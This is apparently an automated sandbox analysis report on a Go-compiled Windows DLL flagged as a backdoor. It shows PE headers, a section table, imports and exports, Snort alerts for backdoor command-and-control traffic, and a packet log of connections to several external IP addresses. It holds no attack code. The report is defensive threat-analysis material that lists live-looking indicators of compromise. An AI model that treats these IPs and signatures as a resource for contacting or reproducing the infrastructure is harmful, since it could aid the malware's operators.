IMAGE_DIRECTORY_ENTRY_IMPORT	0x1636820	0x3c	.rdata2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb05e00	0x2278	.rdata0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1864000	0x338	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xe098e0	0x18	.rdata2
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd5d000	0x10	.rdata1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ec4a8	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4ee000	0x2cf6c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x51b000	0x2ae2d4	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x7ca000	0x36090	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x801000	0x61	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x802000	0x9c0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x803000	0x2c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x804000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata0	0x805000	0x557efa	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata1	0xd5d000	0x2c	0x200	67604db23af61ed397ba55c7a792aa53	False	0.044921875	data	0.15908382530476972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata2	0xd5e000	0xb05310	0xb05400	a8cf5dff2752625951706c910bde0f3e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x1864000	0x338	0x400	905f35a6dd90dba9786fd5cc352e2691	False	0.474609375	data	3.7495568409455093	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	AddVectoredExceptionHandler
msvcrt.dll	__mb_cur_max

Exports

Name	Ordinal	Address
MainFunc	1	0x6c7a6460
_cgo_dummy_export	2	0x6cabf64c

Network Behavior

Download Network PCAP: filtered – full

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/16/24-09:53:35.439965	TCP	2855539	ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2	30865	49711	91.142.73.198	192.168.2.7
07/16/24-09:54:05.158445	TCP	2855538	ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1	30865	49711	91.142.73.198	192.168.2.7
07/16/24-09:54:04.943082	TCP	2855537	ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2	49711	30865	192.168.2.7	91.142.73.198
07/16/24-09:53:35.476708	TCP	2855536	ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1	49711	30865	192.168.2.7	91.142.73.198

Network Port Distribution

Total Packets: 418
• 30865 undefined
• 80 (HTTP)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 16, 2024 09:53:26.080952883 CEST	49701	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:26.086107969 CEST	80	49701	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:26.086189032 CEST	49701	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:26.090117931 CEST	49701	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:26.096364021 CEST	80	49701	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:26.112155914 CEST	49702	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:26.117208958 CEST	80	49702	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:26.117285967 CEST	49702	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:26.119076014 CEST	49702	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:26.124341011 CEST	80	49702	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:27.833595991 CEST	80	49701	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:27.833674908 CEST	49701	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:27.833772898 CEST	49701	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:27.834563017 CEST	49703	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:27.838596106 CEST	80	49701	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:27.839504004 CEST	80	49703	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:27.839570999 CEST	49703	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:27.841810942 CEST	49703	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:27.845649004 CEST	80	49702	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:27.845710993 CEST	49702	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:27.845813990 CEST	49702	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:27.846508026 CEST	49704	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:27.846748114 CEST	80	49703	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:27.850634098 CEST	80	49702	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:27.851278067 CEST	80	49704	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:27.851344109 CEST	49704	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:27.852272034 CEST	49704	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:27.857633114 CEST	80	49704	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:29.593075037 CEST	80	49704	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:29.593153954 CEST	49704	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:29.594897985 CEST	80	49703	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:29.594971895 CEST	49703	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:29.624031067 CEST	49704	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:29.627954006 CEST	49703	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:29.628992081 CEST	80	49704	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:29.632853985 CEST	80	49703	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:29.680737019 CEST	49705	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:29.681518078 CEST	49706	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:29.685616970 CEST	80	49705	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:29.685688972 CEST	49705	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:29.686291933 CEST	80	49706	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:29.686343908 CEST	49706	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:29.704624891 CEST	49705	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:29.704830885 CEST	49706	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:29.709434032 CEST	80	49705	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:29.709567070 CEST	80	49706	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:31.353444099 CEST	80	49706	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:31.353513956 CEST	80	49705	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:31.353539944 CEST	49706	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:31.353585958 CEST	49705	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:31.353651047 CEST	49706	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:31.353796959 CEST	49705	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:31.355885983 CEST	49707	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:31.356506109 CEST	49708	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:31.358589888 CEST	80	49706	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:31.359065056 CEST	80	49705	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:31.361196041 CEST	80	49707	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:31.361295938 CEST	49707	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:31.361479998 CEST	80	49708	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:31.362036943 CEST	49707	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:31.362117052 CEST	49708	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:31.362492085 CEST	49708	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:31.367012024 CEST	80	49707	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:31.367583036 CEST	80	49708	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:32.976327896 CEST	80	49707	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:32.976433039 CEST	49707	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:32.976561069 CEST	49707	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:32.977837086 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:32.978082895 CEST	80	49708	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:32.978203058 CEST	49708	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:32.978267908 CEST	49708	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:32.979310989 CEST	49710	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:32.981468916 CEST	80	49707	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:32.982988119 CEST	80	49709	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:32.983072042 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:32.983230114 CEST	80	49708	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:32.983453035 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:32.984783888 CEST	80	49710	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:32.984873056 CEST	49710	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:32.985330105 CEST	49710	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:32.988255978 CEST	80	49709	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:32.992857933 CEST	80	49710	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:33.607481956 CEST	80	49710	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:33.698774099 CEST	49710	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:33.704567909 CEST	80	49710	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:33.704653978 CEST	49710	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:34.357839108 CEST	80	49709	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:34.446682930 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:34.813927889 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:53:34.819463968 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:53:34.819736958 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:53:35.439965010 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:53:35.476707935 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:53:35.481836081 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:53:39.243135929 CEST	49712	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:39.248389959 CEST	80	49712	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:39.248517990 CEST	49712	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:39.248960018 CEST	49712	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:39.255027056 CEST	80	49712	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:41.008070946 CEST	80	49712	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:41.008414030 CEST	49712	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:41.008827925 CEST	49712	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:53:41.010379076 CEST	49714	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:41.013714075 CEST	80	49712	195.2.70.38	192.168.2.7
Jul 16, 2024 09:53:41.015284061 CEST	80	49714	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:41.015389919 CEST	49714	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:41.015861988 CEST	49714	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:41.021228075 CEST	80	49714	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:42.751744032 CEST	80	49714	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:42.751938105 CEST	49714	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:42.755781889 CEST	49714	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:53:42.759633064 CEST	49719	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:42.760612965 CEST	80	49714	91.142.74.28	192.168.2.7
Jul 16, 2024 09:53:42.764584064 CEST	80	49719	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:42.764687061 CEST	49719	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:42.768517017 CEST	49719	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:42.773473024 CEST	80	49719	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:44.382340908 CEST	80	49719	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:44.383816004 CEST	49719	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:44.384022951 CEST	49719	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:53:44.385370970 CEST	49720	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:44.388875008 CEST	80	49719	77.238.224.56	192.168.2.7
Jul 16, 2024 09:53:44.390254021 CEST	80	49720	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:44.390366077 CEST	49720	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:44.390861034 CEST	49720	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:44.395740032 CEST	80	49720	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:46.028712034 CEST	80	49720	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:46.029313087 CEST	49720	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:46.029405117 CEST	49720	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:53:46.030345917 CEST	49721	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:46.034254074 CEST	80	49720	77.238.229.63	192.168.2.7
Jul 16, 2024 09:53:46.035634041 CEST	80	49721	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:46.035737038 CEST	49721	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:46.036158085 CEST	49721	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:46.041659117 CEST	80	49721	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:46.649691105 CEST	80	49721	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:46.653599977 CEST	49721	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:46.659195900 CEST	80	49721	77.238.250.123	192.168.2.7
Jul 16, 2024 09:53:46.661215067 CEST	49721	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:53:50.498073101 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:53:50.502995014 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:53:55.421591043 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:53:55.421832085 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:53:55.426712990 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:03.736680031 CEST	49722	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:03.741825104 CEST	80	49722	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:03.741931915 CEST	49722	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:03.742208004 CEST	49722	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:03.747289896 CEST	80	49722	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:04.367710114 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:04.373889923 CEST	80	49709	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:04.943082094 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:04.950015068 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:05.158444881 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:05.206280947 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:05.506843090 CEST	80	49722	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:05.507061005 CEST	49722	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:05.507061005 CEST	49722	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:05.508083105 CEST	49723	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:05.512250900 CEST	80	49722	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:05.516997099 CEST	80	49723	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:05.517201900 CEST	49723	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:05.517762899 CEST	49723	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:05.524998903 CEST	80	49723	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:07.254267931 CEST	80	49723	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:07.254345894 CEST	49723	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:07.254478931 CEST	49723	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:07.255443096 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:07.259339094 CEST	80	49723	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:07.260287046 CEST	80	49724	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:07.260358095 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:07.260704041 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:07.268003941 CEST	80	49724	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:08.864559889 CEST	80	49724	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:08.864671946 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:08.864736080 CEST	49724	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:08.865627050 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:08.869710922 CEST	80	49724	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:08.870491028 CEST	80	49725	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:08.870584965 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:08.870898008 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:08.875727892 CEST	80	49725	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:10.565864086 CEST	80	49725	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:10.565956116 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:10.566086054 CEST	49725	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:10.567150116 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:10.570893049 CEST	80	49725	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:10.572067976 CEST	80	49726	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:10.572180033 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:10.572447062 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:10.577307940 CEST	80	49726	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:11.380683899 CEST	80	49726	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:11.381086111 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:11.386409044 CEST	80	49726	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:11.386519909 CEST	49726	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:15.636529922 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:15.637058973 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:15.645559072 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:16.654555082 CEST	49727	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:16.661155939 CEST	80	49727	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:16.661303043 CEST	49727	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:16.661770105 CEST	49727	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:16.668119907 CEST	80	49727	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:18.394433975 CEST	80	49727	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:18.394550085 CEST	49727	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:18.394642115 CEST	49727	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:18.395736933 CEST	49728	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:18.399638891 CEST	80	49727	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:18.400811911 CEST	80	49728	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:18.400897980 CEST	49728	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:18.401199102 CEST	49728	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:18.406164885 CEST	80	49728	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:20.148808002 CEST	80	49728	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:20.148957968 CEST	49728	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:20.149085045 CEST	49728	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:20.150188923 CEST	49730	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:20.154258013 CEST	80	49728	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:20.155213118 CEST	80	49730	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:20.155306101 CEST	49730	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:20.155775070 CEST	49730	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:20.160727024 CEST	80	49730	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:21.775496006 CEST	80	49730	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:21.777416945 CEST	49730	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:21.777549028 CEST	49730	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:21.778810978 CEST	49731	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:21.782267094 CEST	80	49730	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:21.783657074 CEST	80	49731	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:21.783803940 CEST	49731	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:21.796228886 CEST	49731	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:21.801054001 CEST	80	49731	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:23.399080992 CEST	80	49731	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:23.399230957 CEST	49731	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:23.399311066 CEST	49731	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:23.400132895 CEST	49732	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:23.404181957 CEST	80	49731	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:23.405021906 CEST	80	49732	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:23.405098915 CEST	49732	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:23.405297995 CEST	49732	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:23.410059929 CEST	80	49732	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:24.037456036 CEST	80	49732	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:24.037813902 CEST	49732	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:24.043123007 CEST	80	49732	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:24.043224096 CEST	49732	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:30.647844076 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:30.652847052 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:34.382942915 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:34.387820959 CEST	80	49709	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:35.151730061 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:35.157612085 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:35.365715027 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:35.413580894 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:35.858213902 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:35.858547926 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:35.865083933 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:41.376013994 CEST	49733	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:41.381020069 CEST	80	49733	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:41.381145954 CEST	49733	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:41.381474018 CEST	49733	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:41.386239052 CEST	80	49733	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:43.113651991 CEST	80	49733	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:43.113761902 CEST	49733	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:43.113847971 CEST	49733	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:43.114692926 CEST	49734	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:43.118963003 CEST	80	49733	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:43.119750977 CEST	80	49734	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:43.119822979 CEST	49734	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:43.123833895 CEST	49734	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:43.129615068 CEST	80	49734	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:44.866326094 CEST	80	49734	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:44.866419077 CEST	49734	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:44.866513968 CEST	49734	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:44.867398024 CEST	49735	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:44.871620893 CEST	80	49734	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:44.872193098 CEST	80	49735	77.238.224.56	192.168.2.7
